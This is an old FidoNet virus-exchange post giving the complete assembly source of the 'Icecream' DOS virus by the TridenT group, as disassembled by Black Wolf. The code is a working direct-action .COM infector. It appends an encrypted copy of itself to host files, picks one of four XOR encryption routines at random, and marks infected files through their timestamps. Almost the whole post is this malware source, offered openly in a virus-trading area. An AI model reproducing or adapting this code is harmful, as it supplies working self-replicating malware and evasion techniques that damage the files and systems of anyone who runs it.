;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 41 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : ICECREAM.ASM ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Dr T , 2:283/718 (06 Nov 94 17:48) ;* To : Ron Toler ;* Subj : ICECREAM.ASM ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org ;Icecream Virus by the TridenT virus research group. ;This is a simple direct-action com virus that uses one of ;4 encryption algorithms to encrypt itself each time it infects a file. ;It will infect one .COM file in the current directory every time it is ;executed. It marks infections with the time stamp. ;Disassembly by Black Wolf .model tiny .code org 100h start: db 0e9h,0ch,0 ;jmp Virus_Entry Author_Name db 'John Tardy' db 0E2h,0FAh Virus_Entry: push ax call Get_Offset Get_Offset: pop ax sub ax,offset Get_Offset db 89h,0c5h ;mov bp,ax lea si,[bp+Storage] mov di,100h ;Restore file movsw movsb mov ah,1Ah mov dx,0f900h int 21h ;Set DTA mov ah,4Eh FindFirstNext: lea dx,[bp+ComMask] xor cx,cx int 21h ;Find File jnc InfectFile Restore_DTA: mov ah,1Ah mov dx,80h int 21h ;Set DTA to default mov bx,offset start pop ax ;Return to host push bx retn InfectFile: mov ax,4300h mov dx,0f91eh int 21h ;Get file attribs push cx ;save 'em mov ax,4301h xor cx,cx int 21h ;Set them to 0 mov ax,3D02h int 21h ;Open file mov bx,5700h xchg ax,bx int 21h ;Get file time push cx push dx ;save it and cx,1Fh cmp cx,1 ;check for infection jne ContinueInfection db 0e9h,69h,0 ;jmp DoneInfect ContinueInfection: mov ah,3Fh lea dx,[bp+Storage] mov cx,3 int 21h ;Read in first 3 bytes mov ax,cs:[Storage+bp] cmp ax,4D5Ah ;Is it an EXE? je DoneInfect cmp ax,5A4Dh je DoneInfect ;Other EXE signature? pop dx pop cx and cx,0FFE0h ;Change stored time values or cx,1 ;to mark infection push cx push dx mov ax,4202h ;Go to the end of the file call Move_FP sub ax,3 mov cs:[JumpSize+bp],ax ;Save jump size add ax,10Fh ;Save encryption starting mov word ptr [bp+EncPtr1+1],ax ;point.... mov word ptr [bp+EncPtr2+1],ax mov word ptr [bp+EncPtr3+1],ax mov word ptr [bp+EncPtr4+1],ax call SetupEncryption ;Encrypt virus mov ah,40h mov dx,0fa00h mov cx,1F5h int 21h ;Write virus to file mov ax,4200h call Move_FP ;Go to the beginning of file mov ah,40h lea dx,[bp+JumpBytes] mov cx,3 int 21h ;Write in jump call FinishFile jmp Restore_DTA DoneInfect: call FinishFile mov ah,4Fh jmp FindFirstNext Move_FP: xor cx,cx xor dx,dx int 21h ret FinishFile: pop si dx cx mov ax,5701h ;Reset file time/date stamp int 21h ;(or mark infection) mov ah,3Eh int 21h ;Close new host file mov ax,4301h pop cx mov dx,0fc1eh int 21h ;Restore old attributes push si retn Message db ' I scream, you scream, we both ' db 'scream for an ice-cream! ' SetupEncryption: xor byte ptr [bp+10Dh],2 xor ax,ax mov es,ax mov ax,es:[46ch] ;Get random number push cs pop es push ax and ax,7FFh add ax,1E9h mov word ptr [bp+EncSize1+1],ax mov word ptr [bp+EncSize2+1],ax mov word ptr [bp+EncSize3+1],ax mov word ptr [bp+EncSize4+1],ax pop ax push ax and ax,3 shl ax,1 mov si,ax mov ax,[bp+si+EncData1] add ax,bp mov si,ax lea di,[bp+103h] movsw movsw movsw movsw ;Copy Encryption Algorithm pop ax stosb movsb mov dl,al lea si,[bp+103h] mov di,0fa00h mov cx,0Ch rep movsb lea si,[bp+10Fh] mov cx,1E9h EncryptVirus: lodsb db 30h,0d0h ;xor al,dl stosb loop EncryptVirus cmp dl,0 je KeyWasZero retn KeyWasZero: ;If key is zero, increase mov si,offset AuthorName ;jump size and place name mov di,0fa00h ;at beginning.... mov cx,0Ah rep movsb mov ax,cs:[JumpSize+bp] add ax,0Ch mov cs:[JumpSize+bp],ax retn db '[TridenT]' EncData1 dw 02beh EncData2 dw 02c7h EncData3 dw 02d0h EncData4 dw 02d9h Encryptions: ;------------------------------------------------------------ EncPtr1: mov si,0 EncSize1: mov cx,0 xor byte ptr [si],46h ;------------------------------------------------------------ EncPtr2: mov di,0 EncSize2: mov cx,0 xor byte ptr [di],47h ;------------------------------------------------------------ EncSize3: mov cx,0 EncPtr3: mov si,0 xor byte ptr [si],46h ;------------------------------------------------------------ EncSize4: mov cx,0 EncPtr4: mov di,0 xor byte ptr [di],47h ;------------------------------------------------------------ AuthorName db 'John Tardy' JumpBytes db 0E9h JumpSize dw 0 ComMask db '*.CoM',0 Storage dw 20CDh db 21h end start ;-+- GEcho 1.10+ ; + Origin: This virus is Microsoft Windows (2:283/718) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/x Include false conditionals in listing ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)